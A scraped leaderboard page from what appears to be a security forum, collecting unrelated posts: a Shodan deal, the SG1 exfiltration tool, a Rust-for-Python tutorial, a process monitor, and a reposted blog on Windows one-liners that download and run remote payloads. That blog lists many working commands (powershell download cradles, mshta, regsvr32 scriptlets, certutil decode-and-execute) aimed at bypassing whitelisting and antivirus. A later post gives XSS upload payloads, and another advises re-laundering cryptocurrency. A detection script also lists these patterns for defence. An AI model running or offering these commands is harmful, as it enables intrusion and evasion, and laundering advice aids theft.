Leaderboard

Popular Content

Showing content with the highest reputation on 11/24/17 in all areas

  1. Shodan offer: lifetime upgrade to a premium account for $5 instead of $49. Includes: all add-ons (HTTPS, Telnet, up to 10000 search results); 20 export credits; Shodan maps, images, command-line; free copy of the Shodan book.
    3 points
  2. SG1
     BECAUSE REASONS
     SG1 is a wannabe swiss army knife for data encryption, exfiltration and covert communication. At its core sg1 aims to be as simple to use as nc while maintaining high modularity internally, being a framework for bizarre exfiltration, data manipulation and transfer methods. Have you ever thought of having your chats or data transfers tunneled through encrypted, private and self-deleting pastebins? What about sending that stuff to some dns client -> dns server bridge? Then TLS maybe?
     WORK IN PROGRESS, DON'T JUDGE
     Installation
     Make sure you have at least go 1.8 in order to build sg1, then:
         go get github.com/miekg/dns
         go get github.com/evilsocket/sg1
         cd $GOPATH/src/github.com/evilsocket/sg1/
         make
     If you want to build for a different OS and/or architecture, you can instead do:
         GOOS=windows GOARCH=386 make
     After compilation, you will find the sg1 binary inside the build folder; you can start by taking a look at the help menu:
         ./build/sg1 -h
     Source: https://github.com/evilsocket/sg1
    2 points
  3. Those bugs were found in Ethereum, in smart contracts. As I said earlier: in BTC and ETH you can see everything that gets executed but you CANNOT control, block or modify anything! It is transparent but immutable. Those bugs allowed (through the programmers' carelessness) things to be done that should never have been executed (for example, transferring money from other people's wallets into their own wallet without their consent). After a hacker abuses the bug, everybody sees the mistake that was made and "who" stole the money. But because of immutability NOBODY can return the money to its rightful owner. All that can be done is to fix the bug so it can no longer be abused in the future. That's why you see news like "hacker stole 12456,58 $ and nobody can stop him anymore" (it is known exactly when, how much and how). ON: http://www.techradar.com/how-to/how-to-use-a-bitcoin-tumbler that tutorial is very superficial. In certain cases the amounts can be monitored and, up to a point, links can be made between the original wallet and the temporary one. Also, you have to take care to re-launder the money every time you spend it. There are simpler schemes that are proven to be anonymous.
    2 points
  4. Web Development
     Web languages: PHP, Javascript
     Design: Bootstrap
     Template engine: Smarty
     Editing/fixing/optimization: Wordpress
     Framework for scrapers: Simple HTML Dom
     Information
     - I accept long-term as well as short-term projects.
     - For every project all details will be settled with the client at the start; no new features can be added during the project (only small changes).
     - Support is entirely FREE. By support I mean: installation, bug fixing, MySQL fixing, etc.
     - Prices will be set according to the time the project requires and its complexity.
     - I also accept jobs with a monthly salary.
     - I also accept jobs paid by the hour.
     Portfolio:
     - I offer live previews of projects in private or via TeamViewer (I am not allowed to share the companies' links, but I can show pictures).
     Payment
     - BitCoin/Ethereum
     - PayPal
     - Bank transfer
     - Paysafe
     Contact
     - ICQ: CURRENTLY UNAVAILABLE
     - Telegram: @adicode
     - Skype: adicode32@outlook.com
     - Jabber: adicode@404.city
     **Please do not leave messages like "I added you", "how much would it cost?", "can you do this?" in the topic. I await any question by PM or on one of the networks above. Thank you.
    1 point
  5. What is Rust?
     Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. Featuring:
     - zero-cost abstractions
     - move semantics
     - guaranteed memory safety
     - threads without data races
     - trait-based generics
     - pattern matching
     - type inference
     - minimal runtime
     - efficient C bindings
     Description is taken from rust-lang.org.

     Why does it matter for a Python developer?
     The better description of Rust I heard from Elias (a member of the Rust Brazil Telegram Group). There are a bunch of Rust packages out there to help you extend Python with Rust. I can mention Milksnake, created by Armin Ronacher (the creator of Flask), and also PyO3, the Rust bindings for the Python interpreter. See a complete reference list at the bottom of this article.

     Let's see it in action
     For this post, I am going to use Rust Cpython; it's the only one I have tested, it is compatible with the stable version of Rust and I found it straightforward to use.
     Pros: It is easy to write Rust functions and import them from Python, and as you will see by the benchmarks it is worth it in terms of performance.
     Cons: The distribution of your project/lib/framework will demand the Rust module to be compiled on the target system because of variation of environment and architecture; there will be a compiling stage which you don't have when installing pure Python libraries. You can make it easier using rust-setuptools or using MilkSnake to embed binary data in Python wheels.

     Python is sometimes slow
     Yes, Python is known for being "slow" in some cases, and the good news is that this doesn't really matter depending on your project goals and priorities. For most projects, this detail will not be very important. However, you may face the rare case where a single function or module is taking too much time and is detected as the bottleneck of your project's performance; this often happens with string parsing and image processing.

     Example
     Let's say you have a Python function which does some string processing. Take the following easy example of counting pairs of repeated chars, but have in mind that this example can be reproduced with other string processing functions or any other generally slow process in Python.

         # How many subsequent-repeated groups of chars are in the given string?
         abCCdeFFghiJJklmnopqRRstuVVxyZZ... {millions of chars here}

     Python is slow for doing large string processing, so you can use pytest-benchmark to compare a pure Python (with iterator zipping) function versus a regexp implementation.

         # Using a Python3.6 environment
         $ pip3 install pytest pytest-benchmark

     Then write a new Python program called doubles.py:

         import re
         import string
         import random

         # Python ZIP version
         def count_doubles(val):
             total = 0
             # there is an improved version later on this post
             for c1, c2 in zip(val, val[1:]):
                 if c1 == c2:
                     total += 1
             return total

         # Python REGEXP version
         double_re = re.compile(r'(?=(.)\1)')

         def count_doubles_regex(val):
             return len(double_re.findall(val))

         # Benchmark it
         # generate 1M of random letters to test it
         val = ''.join(random.choice(string.ascii_letters) for i in range(1000000))

         def test_pure_python(benchmark):
             benchmark(count_doubles, val)

         def test_regex(benchmark):
             benchmark(count_doubles_regex, val)

     Run pytest to compare:

         $ pytest doubles.py
         =============================================================================
         platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4.
         benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_roun
         rootdir: /Projects/rustpy, inifile:
         plugins: benchmark-3.1.1
         collected 2 items

         doubles.py ..

         -----------------------------------------------------------------------------
         Name (time in ms)          Min                Max                Mean
         -----------------------------------------------------------------------------
         test_regex             24.6824 (1.0)      32.3960 (1.0)      27.0167 (1.0)
         test_pure_python       51.4964 (2.09)     62.5680 (1.93)     52.8334 (1.96)
         -----------------------------------------------------------------------------

     Let's take the Mean for comparison:
     - Regexp – 27.0167 <– less is better
     - Python Zip – 52.8334

     Extending Python with Rust
     Create a new crate
     crate is how we call Rust packages.
     Having Rust installed (the recommended way is https://www.rustup.rs/, also available in Fedora and RHEL repositories via the rust-toolset), I used rustc 1.21.0.
     In the same folder run:

         cargo new pyext-myrustlib

     It creates a new Rust project in that same folder called pyext-myrustlib containing the Cargo.toml (cargo is the Rust package manager) and also a src/lib.rs (where we write our library implementation).

     Edit Cargo.toml
     It will use the rust-cpython crate as dependency and tell cargo to generate a dylib to be imported from Python.

         [package]
         name = "pyext-myrustlib"
         version = "0.1.0"
         authors = ["Bruno Rocha <rochacbruno@gmail.com>"]

         [lib]
         name = "myrustlib"
         crate-type = ["dylib"]

         [dependencies.cpython]
         version = "0.1"
         features = ["extension-module"]

     Edit src/lib.rs
     What we need to do:
     - Import all macros from the cpython crate.
     - Take the Python and PyResult types from CPython into our lib scope.
     - Write the count_doubles function implementation in Rust; note that this is very similar to the pure Python version except for:
       - It takes a Python as first argument, which is a reference to the Python interpreter and allows Rust to use the Python GIL.
       - Receives a &str typed val as reference.
       - Returns a PyResult, which is a type that allows raising Python exceptions.
       - Returns a PyResult object in Ok(total) (Result is an enum type that represents either success (Ok) or failure (Err)), and as our function is expected to return a PyResult the compiler will take care of wrapping our Ok in that type (note that our PyResult expects a u64 as return value).
     - Using the py_module_initializer! macro we register new attributes to the lib, including the __doc__, and also we add the count_doubles attribute referencing our Rust implementation of the function.
       - Pay attention to the names libmyrustlib, initlibmyrustlib, and PyInit.
       - We also use the try! macro, which is the equivalent of Python's try..except.
       - Return Ok(()) – the () is an empty result tuple, the equivalent of None in Python.

         #[macro_use]
         extern crate cpython;

         use cpython::{Python, PyResult};

         fn count_doubles(_py: Python, val: &str) -> PyResult<u64> {
             let mut total = 0u64;

             // There is an improved version later on this post
             for (c1, c2) in val.chars().zip(val.chars().skip(1)) {
                 if c1 == c2 {
                     total += 1;
                 }
             }

             Ok(total)
         }

         py_module_initializer!(libmyrustlib, initlibmyrustlib, PyInit_myrustlib, |py, m | {
             try!(m.add(py, "__doc__", "This module is implemented in Rust"));
             try!(m.add(py, "count_doubles", py_fn!(py, count_doubles(val: &str))));
             Ok(())
         });

     Now let's build it with cargo:

         $ cargo build --release
             Finished release [optimized] target(s) in 0.0 secs

         $ ls -la target/release/libmyrustlib*
         target/release/libmyrustlib.d
         target/release/libmyrustlib.so*  <-- Our dylib is here

     Now let's copy the generated .so lib to the same folder where our doubles.py is located.
     NOTE: on Fedora you must get a .so; on other systems you may get a .dylib, and you can rename it by changing the extension to .so.

         $ cd ..
         $ ls
         doubles.py pyext-myrustlib/

         $ cp pyext-myrustlib/target/release/libmyrustlib.so myrustlib.so

         $ ls
         doubles.py myrustlib.so pyext-myrustlib/

     Having the myrustlib.so in the same folder or added to your Python path allows it to be directly imported, transparently as if it were a Python module.

     Importing from Python and comparing the results
     Edit your doubles.py, now importing our Rust implemented version and adding a benchmark for it.

         import re
         import string
         import random
         import myrustlib   # <-- Import the Rust implemented module (myrustlib.so)


         def count_doubles(val):
             """Count repeated pair of chars in a string"""
             total = 0
             for c1, c2 in zip(val, val[1:]):
                 if c1 == c2:
                     total += 1
             return total


         double_re = re.compile(r'(?=(.)\1)')


         def count_doubles_regex(val):
             return len(double_re.findall(val))


         val = ''.join(random.choice(string.ascii_letters) for i in range(1000000))


         def test_pure_python(benchmark):
             benchmark(count_doubles, val)


         def test_regex(benchmark):
             benchmark(count_doubles_regex, val)


         def test_rust(benchmark):   # <-- Benchmark the Rust version
             benchmark(myrustlib.count_doubles, val)

     Benchmark

         $ pytest doubles.py
         ==============================================================================
         platform linux -- Python 3.6.0, pytest-3.2.3, py-1.4.34, pluggy-0.4.
         benchmark: 3.1.1 (defaults: timer=time.perf_counter disable_gc=False min_round
         rootdir: /Projects/rustpy, inifile:
         plugins: benchmark-3.1.1
         collected 3 items

         doubles.py ...

         -----------------------------------------------------------------------------
         Name (time in ms)          Min                Max                Mean
         -----------------------------------------------------------------------------
         test_rust               2.5555 (1.0)       2.9296 (1.0)       2.6085 (1.0)
         test_regex             25.6049 (10.02)    27.2190 (9.29)     25.8876 (9.92)
         test_pure_python       52.9428 (20.72)    56.3666 (19.24)    53.9732 (20.69)
         -----------------------------------------------------------------------------

     Let's take the Mean for comparison:
     - Rust – 2.6085 <– less is better
     - Regexp – 25.8876
     - Python Zip – 53.9732
     The Rust implementation can be 10x faster than the Python Regex and 21x faster than the pure Python version. Interesting that the Regex version is only 2x faster than pure Python 🙂
     NOTE: Those numbers make sense only for this particular scenario; for other cases the comparison may be different.

     Updates and Improvements
     After this article was published I got some comments on r/python and also on r/rust. The contributions came as Pull Requests and you can send a new one if you think the functions can be improved.
     Thanks to Josh Stone we got a better implementation for Rust which iterates the string only once, and also the Python equivalent.
     Thanks to Purple Pixie we got a Python implementation using itertools; however, this version is not performing any better and still needs improvements.

     Iterating only once

         fn count_doubles_once(_py: Python, val: &str) -> PyResult<u64> {
             let mut total = 0u64;
             let mut chars = val.chars();
             if let Some(mut c1) = chars.next() {
                 for c2 in chars {
                     if c1 == c2 {
                         total += 1;
                     }
                     c1 = c2;
                 }
             }
             Ok(total)
         }

         def count_doubles_once(val):
             total = 0
             chars = iter(val)
             c1 = next(chars, None)   # default guards against an empty string (bare next() would raise StopIteration)
             for c2 in chars:
                 if c1 == c2:
                     total += 1
                 c1 = c2
             return total

     Python with itertools

         import itertools

         def count_doubles_itertools(val):
             c1s, c2s = itertools.tee(val)
             next(c2s, None)

             total = 0
             for c1, c2 in zip(c1s, c2s):
                 if c1 == c2:
                     total += 1
             return total

     New Results

         -------------------------------------------------------------------------------
         Name (time in ms)            Min                Max                Mean
         -------------------------------------------------------------------------------
         test_rust_once            1.0072 (1.0)       1.7659 (1.0)       1.1268 (1.0)
         test_rust                 2.6228 (2.60)      4.5545 (2.58)      2.9367 (2.61)
         test_regex               26.0261 (25.84)    32.5899 (18.45)    27.2677 (24.20)
         test_pure_python_once    38.2015 (37.93)    43.9625 (24.90)    39.5838 (35.13)
         test_pure_python         52.4487 (52.07)    59.4220 (33.65)    54.8916 (48.71)
         test_itertools           58.5658 (58.15)    66.0683 (37.41)    60.8705 (54.02)
         -------------------------------------------------------------------------------

     The new Rust implementation is 3x better than the old, but the python-itertools version is even slower than the pure Python one.
     After adding the improvements to iterate the list of chars only once, Rust still has the advantage: 1.1268 vs 39.583.

     Conclusion
     Rust may not yet be the general purpose language of choice, given its level of complexity, and may not yet be the better choice for writing common simple applications such as web sites and test automation scripts. However, for specific parts of the project where Python is known to be the bottleneck and your natural choice would be implementing a C/C++ extension, writing this extension in Rust seems easy and better to maintain. There are still many improvements to come in Rust and lots of other crates to offer Python <--> Rust integration. Even if you are not including the language in your tool belt right now, it is really worth keeping an eye open to the future!

     References
     The code snippets for the examples shown here are available in the GitHub repo: https://github.com/rochacbruno/rust-python-example.
     The examples in this publication are inspired by the Extending Python with Rust talk by Samuel Cormier-Iijima at Pycon Canada. video here:
     Also by My Python is a little Rust-y by Dan Callahan at Pycon Montreal. video here:
     Other references:
     - https://github.com/mitsuhiko/snaek
     - https://github.com/PyO3/pyo3
     - https://pypi.python.org/pypi/setuptools-rust
     - https://github.com/mckaymatt/cookiecutter-pypackage-rust-cross-platform-publish
     - http://jakegoulding.com/rust-ffi-omnibus/
     - https://github.com/urschrei/polylabel-rs/blob/master/src/ffi.rs
     - https://bheisler.github.io/post/calling-rust-in-python/
     - https://github.com/saethlin/rust-lather

     Join Community
     Join the Rust community; you can find group links in https://www.rust-lang.org/en-US/community.html. If you speak Portuguese, I recommend you join https://t.me/rustlangbr, and there is the http://bit.ly/canalrustbr on Youtube.

     Author
     Bruno Rocha
     Senior Quality Engineer at Red Hat
     Teaching Python and Flask at CursoDePython.com.br
     Fellow Member of Python Software Foundation
     Member of RustBR study group
     More info: http://about.me/rochacbruno and http://brunorocha.org
     Source
    1 point
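As an added example (not code from the article or its repository), a pure Python harness that keeps the post's Python variants side by side, makes the single-pass version safe on an empty string, and checks all implementations against constructed edge cases that a benchmark over random ASCII letters never exercises; the post's regex `(?=(.)\1)` does not count a doubled newline unless re.DOTALL is set, which is exactly the kind of discrepancy to catch before a native replacement ships:

```python
import random
import re
import string
import timeit


def count_doubles_zip(val):
    """The post's zip() version: pair each char with its successor."""
    return sum(1 for c1, c2 in zip(val, val[1:]) if c1 == c2)


def count_doubles_once(val):
    """Single-pass version; next(chars, None) keeps it safe on an empty
    string, where a bare next(chars) would raise StopIteration."""
    total = 0
    chars = iter(val)
    c1 = next(chars, None)
    for c2 in chars:
        if c1 == c2:
            total += 1
        c1 = c2
    return total


DOUBLE_RE = re.compile(r"(?=(.)\1)")                     # the post's pattern: '.' skips '\n'
DOUBLE_RE_DOTALL = re.compile(r"(?=(.)\1)", re.DOTALL)   # '.' matches '\n' as well


def count_doubles_regex(val):
    return len(DOUBLE_RE.findall(val))


def count_doubles_regex_dotall(val):
    return len(DOUBLE_RE_DOTALL.findall(val))


IMPLEMENTATIONS = {
    "zip": count_doubles_zip,
    "once": count_doubles_once,
    "regex": count_doubles_regex,
    "regex_dotall": count_doubles_regex_dotall,
}

# Constructed inputs covering boundaries that random ASCII letters never hit.
EDGE_CASES = {
    "empty": "",
    "single": "a",
    "triple": "aaa",        # two overlapping pairs, not one
    "newlines": "a\n\nb",   # a doubled newline
    "non_ascii": "ééx",     # one pair of non-ASCII code points
}


def disagreements(cases=EDGE_CASES):
    """{case_name: {impl_name: result}} for every case where the
    implementations do not all return the same count."""
    out = {}
    for name, text in cases.items():
        results = {impl: fn(text) for impl, fn in IMPLEMENTATIONS.items()}
        if len(set(results.values())) > 1:
            out[name] = results
    return out


def benchmark(n=100_000, repeat=3, seed=1337):
    """Best-of-`repeat` wall time in milliseconds per implementation on a
    reproducible random string of n ASCII letters (seeded, so runs compare)."""
    rng = random.Random(seed)
    val = "".join(rng.choice(string.ascii_letters) for _ in range(n))
    return {
        impl: min(timeit.repeat(lambda: fn(val), number=1, repeat=repeat)) * 1000
        for impl, fn in IMPLEMENTATIONS.items()
    }


if __name__ == "__main__":
    for case, results in disagreements().items():
        print(f"{case}: {results}")
    for impl, ms in sorted(benchmark().items(), key=lambda kv: kv[1]):
        print(f"{impl:>13}: {ms:8.3f} ms")
```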
  6. If stupidity hurt... you'd be writhing on the floor.. @yoyois, you sure found someone to have a conversation with
    1 point
  7. UPDATE. 24.11.2017. I have added other payment methods and contact addresses.
    1 point
  8. Online Black Friday / Thanksgiving Day promotions: https://pastebin.com/EvJJqBJD (via: https://twitter.com/bbaskin/status/934074433664442369) If you look through the Twitter thread there are a few more...
    1 point
  9. Syscall Monitor
     Introduction
     This is a process monitoring tool (like Sysinternals' Process Monitor) implemented with Intel VT-x/EPT for Windows 7+.
     Development environment
     - Visual Studio 2015 update 3
     - Windows SDK 10
     - Windows Driver Kit 10
     - QT5.7 for MSVC
     Deployment
     - QT GUI project: SyscallMonQT/SyscallMonQT.pro
     - Windows kernel driver project: ddimon/DdiMon/DdiMon.vcxproj
     - Remember to modify the shadow build path to /build32 or /build64 when configuring the QT project
     - Remember to modify the windeploy.exe path in deploy32/deploy64.bat, then run deploy32/64.bat to deploy x86/x64 binary files to bin32/bin64
     - Remember to sign the x64 kernel driver file
     Platform
     - x86 and x64
     - Windows 7, 8.1 and 10
     - CPU with Intel VT-x and EPT technology support
     Reference & Thanks
     - BOOST http://www.boost.org/
     - QT https://www.qt.io/
     - HyperPlatform https://github.com/tandasat/HyperPlatform
     - Capstone http://www.capstone-engine.org/
     TODO
     1. Optimize the memory usage issue.
     Source: https://github.com/hzqst/Syscall-Monitor
    1 point
  10. Windows oneliners to download remote payload and execute arbitrary code
      20 November 2017, arno0x0x
      In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner »? These command lines need to fulfill the following prerequisites:
      - allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits, huh?
      - allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it?
      - be proxy aware – because which company doesn't use a web proxy for outgoing traffic nowadays?
      - make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as many systems as possible
      - be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet?
      - work in memory only – because your final payload might get caught by AV when written on disk
      A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries. Let's be clear that not all command lines will fulfill all of the above points, especially the « do not write the payload on disk » one, because most of the time the downloaded file will end up in a local cache.
      When it comes to downloading a payload from a remote server, it basically boils down to 3 options:
      - either the command itself accepts an HTTP URL as one of its arguments
      - the command accepts a UNC path (pointing to a WebDAV server)
      - the command can execute a small inline script with a download cradle
      Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one of the following locations:
          C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
          C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>
      On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:
          C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
      When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it's not started, in order to start it even from a low privileged user, simply prepend your command line with « pushd \\webdavserver & popd ».
      In all of the following scenarios, I'll mention which process is seen as performing the network traffic and where the payload is written on disk.

      Powershell
      Ok, this is by far the most famous one, but also probably the most monitored one, if not blocked. A well known proxy friendly command line is the following:
          powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
      Process performing network call: powershell.exe
      Payload written on disk: NO (at least nowhere I could find using procmon!)
      Of course you could also use its encoded counterpart.
      But you can also call the payload directly from a WebDAV server:
          powershell -exec bypass -f \\webdavserver\folder\payload.ps1
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Cmd
      Why make things complicated when you can have cmd.exe executing a batch file? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of!). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior's work), and see that you can easily drop any binary, dll, script: https://github.com/Arno0x/PowerShellScripts
      So once you've been creative with your payload as a batch file, go for it:
          cmd.exe /k < \\webdavserver\folder\batchfile.txt
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Cscript/Wscript
      Also very common, but the idea here is to download the payload from a remote server in one command line:
          cscript //E:jscript \\webdavserver\folder\payload.txt
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Mshta
      Mshta really is the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload:
          mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
      Process performing network call: mshta.exe
      Payload written on disk: IE local cache
      You could also do a much simpler trick, since mshta accepts a URL as an argument to execute an HTA file:
          mshta http://webserver/payload.hta
      Process performing network call: mshta.exe
      Payload written on disk: IE local cache
      Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff:
          mshta \\webdavserver\folder\payload.hta
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Rundll32
      A well known one as well; it can be used in different ways. The first one is referring to a standard DLL using a UNC path:
          rundll32 \\webdavserver\folder\payload.dll,entrypoint
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache
      Rundll32 can also be used to call some inline jscript:
          rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
      Process performing network call: rundll32.exe
      Payload written on disk: IE local cache

      Regasm/Regsvc
      Regasm and Regsvc are one of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Regsvr32
      Another one from @subTee. This one requires a slightly different scriptlet from the mshta one above. First option:
          regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
      Process performing network call: regsvr32.exe
      Payload written on disk: IE local cache
      Second option using UNC/WebDAV:
          regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Odbcconf
      This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. To be noted is that the DLL file doesn't need to have the .dll extension. It can be downloaded using UNC/WebDAV:
          odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache

      Msbuild
      Let's keep going with all these .Net framework utilities discovered by @subTee. You can NOT use msbuild.exe with inline tasks straight from a UNC path (actually, you can, but it gets really messy), so I ended up with the following trick, using msbuild.exe only. Note that it will require being called within a shell with ENABLEDELAYEDEXPANSION (/V option):
          cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
      Process performing network call: svchost.exe
      Payload written on disk: WebDAV client local cache
      Not sure this one is really useful as is. As we'll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

      Combining some commands
      After all, having the possibility to execute a command line (from DDE for instance) doesn't mean you should restrict yourself to only one command. Commands can be chained to reach an objective. For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:
          certutil -urlcache -split -f http://webserver/payload payload
      Now combining some commands in one line, with InstallUtil.exe executing a specific DLL as a payload:
          certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
      You could simply deliver an executable:
          certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
      There are probably many other ways of achieving the same result, but these command lines do the job while fulfilling most of the prerequisites we set at the beginning of this post!
      One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I've left this one aside on purpose simply because it's not proxy aware.

      Payloads source examples
      All the command lines previously cited make use of specific payloads:
      - Various scriptlets (.sct), for mshta, rundll32 or regsvr32
      - HTML Application (.hta)
      - MSBuild inline tasks (.xml or .csproj)
      - DLL for InstallUtil or Regasm/Regsvc
      You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco.
      You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT
      You can also find some other examples on my gist: https://gist.github.com/Arno0x
      Source: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
    1 point
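From the defender's side, as an added example that is not part of the post: a small Python matcher that runs the patterns the post walks through (script hosts reading a UNC/WebDAV path, the mshta/regsvr32/rundll32 scriptlet loaders, certutil downloads, the pushd trick that starts WebClient) over constructed process-creation events, raises the severity when the parent is an Office process (the DDE context the post opens with), and attaches the on-disk cache location the post gives for each download method. Rule names, the event layout and the sample events are my own, not the author's.

```python
import re

# Constructed process-creation events (parent image, image, command line), modelled on
# the one-liners in the post, plus two benign events that must not raise an alert.
SAMPLE_EVENTS = [
    ("WINWORD.EXE", "powershell.exe",
     "powershell -exec bypass -c \"(New-Object Net.WebClient).Proxy.Credentials="
     "[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex\""),
    ("WINWORD.EXE", "cmd.exe", r"cmd.exe /k < \\webdavserver\folder\batchfile.txt"),
    ("EXCEL.EXE", "mshta.exe",
     'mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))'),
    ("explorer.exe", "regsvr32.exe",
     "regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll"),
    ("cmd.exe", "certutil.exe",
     "certutil -urlcache -split -f http://webserver/payload.b64 payload.b64"),
    ("WINWORD.EXE", "cmd.exe", r'cmd /c "pushd \\webdavserver & popd"'),
    ("explorer.exe", "certutil.exe", r"certutil -hashfile C:\Users\alice\report.pdf SHA256"),
    ("services.exe", "svchost.exe", "svchost.exe -k NetworkService"),
]

# Each rule is (name, regex) applied case-insensitively to "<image> <command line>".
LOLBIN_RULES = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in [
    ("powershell_download_cradle",
     r"powershell.*(iwr|invoke-webrequest|downloadstring|net\.webclient).*\|\s*iex"),
    ("script_host_reads_unc_path",
     r"\b(powershell|cmd|cscript|wscript|mshta|rundll32|regasm|regsvr32|odbcconf|msbuild)"
     r"(\.exe)?\b.*\\\\[\w.-]+\\"),
    ("mshta_inline_or_url", r"mshta(\.exe)?\s+(vbscript:|javascript:|https?://)"),
    ("regsvr32_scriptlet", r"regsvr32(\.exe)?.*/i:\S+.*scrobj\.dll"),
    ("rundll32_javascript", r"rundll32(\.exe)?\s+javascript:"),
    ("certutil_download", r"certutil(\.exe)?.*-urlcache.*https?://"),
    ("odbcconf_regsvr", r"odbcconf(\.exe)?.*/a\s*\{regsvr"),
    ("webclient_start_via_pushd", r"pushd\s+\\\\\S+\s*&\s*popd"),
]]

# Office parents: the post's "Office spawning cmd.exe is already a bad sign".
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def cache_hint(cmdline):
    """Where the post says the fetched payload lands on disk, for forensic follow-up."""
    if re.search(r"\\\\[\w.-]+\\", cmdline):
        return (r"WebDAV client cache C:\Windows\ServiceProfiles\LocalService\AppData\Local"
                r"\Temp\TfsStore\Tfs_DAV (network traffic appears from svchost.exe)")
    if re.search(r"https?://", cmdline, re.IGNORECASE):
        return "IE cache (Temporary Internet Files / INetCache; traffic from the process itself)"
    return "none inferred"


def analyze(events):
    """Return one alert dict per event that matches at least one rule, in input order."""
    alerts = []
    for parent, image, cmdline in events:
        haystack = f"{image} {cmdline}"
        hits = [name for name, rx in LOLBIN_RULES if rx.search(haystack)]
        if not hits:
            continue
        alerts.append({
            "parent": parent,
            "image": image,
            "rules": hits,
            "severity": "high" if parent.lower() in OFFICE_PARENTS else "medium",
            "cache_hint": cache_hint(cmdline),
        })
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a['severity']:6}] {a['parent']} -> {a['image']}: {', '.join(a['rules'])}")
        print(f"         payload on disk: {a['cache_hint']}")
```

The two benign events (a certutil hash check and a normal svchost service host) stay silent, which is the part worth keeping an eye on when tuning these patterns against real telemetry.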
  11. Why BlackList < WhiteList 22 Nov 2017 Often, when you write the code, which is responsible for file uploading, you check the extensions of downloaded file with using “whitelist” (when you can upload only files with certain extensions) or “blacklist” (when you can upload any files which are not included in the list). After the @ldionmarcil’s post, I decided to understand how popular web-servers interact with various types of extensions. Firstly, I was interested in which content-type is returned by the web-server on different file types. Developers usually include only well-known and obvious extensions in the blacklist. In the article, I want to consider not the wide-spreading file types. For demonstration PoC, I used the following payloads: Basic XSS payload: <script>alert(1337)</script> XML-based XSS payload: <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script> Below I’ll show the results of this little research. IIS web server By default, IIS responds with the text/html content-type on the file types, which presented in list below: Extensions with basic vector: .cer .hxt .htm Therefore, it is possible to paste the basic XSS vector in the uploaded file, and we will get an alert box in browser after opening the document. The list below includes extensions on which IIS responds with the content-type which allow to execute XSS via XML-based vector. Extensions with XML-based vector: .dtd .mno .vml .xsl .xht .svg .xml .xsd .xsf .svgz .xslt .wsdl .xhtml By default, IIS also supports SSI, however exec section is prohibited for the security reasons Extensions for SSI: .stm .shtm 